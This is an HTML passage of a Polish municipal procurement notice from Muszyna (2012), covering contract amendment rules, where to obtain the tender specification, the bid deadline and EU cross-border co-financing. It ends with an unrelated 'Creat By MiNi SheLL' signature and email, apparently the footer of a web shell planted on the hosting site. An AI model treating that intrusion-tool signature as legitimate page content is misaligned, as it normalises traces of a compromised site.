2. Dopuszczalne są wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania nie wpłynęła by na krąg podmiotów ubiegających się o zamówienie ani wynik postępowania. Takimi zmianami są zmiany o charakterze administracyjno - organizacyjnym umowy np. : zmiana konta, siedziby firmy, zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy. 
3. Zmiany do umowy może inicjować zarówno Zamawiający jak i Wykonawca, składając pisemny wniosek do drugiej strony zawierający w szczególności opis zmiany i jej uzasadnienie. Zamawiający przewiduje katalog zmian na które może wyrazić zgodę powyższe nie stanowi jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muszyna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Uzdrowiskowej Muszyna ul. Rynek 31, 33-370 Muszyna. Pok. Nr 19.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.01.2012 godzina 11:50, miejsce: Urząd Miasta i Gminy Uzdrowiskowej Muszyna ul. Rynek 31, 33-370 Muszyna. Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego oraz budżetu państwa za pośrednictwem Euroregionu Tatry w ramach Programu Współpracy Transgranicznej Rzeczpospolita Polska - Republika Słowacka 2007 - 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com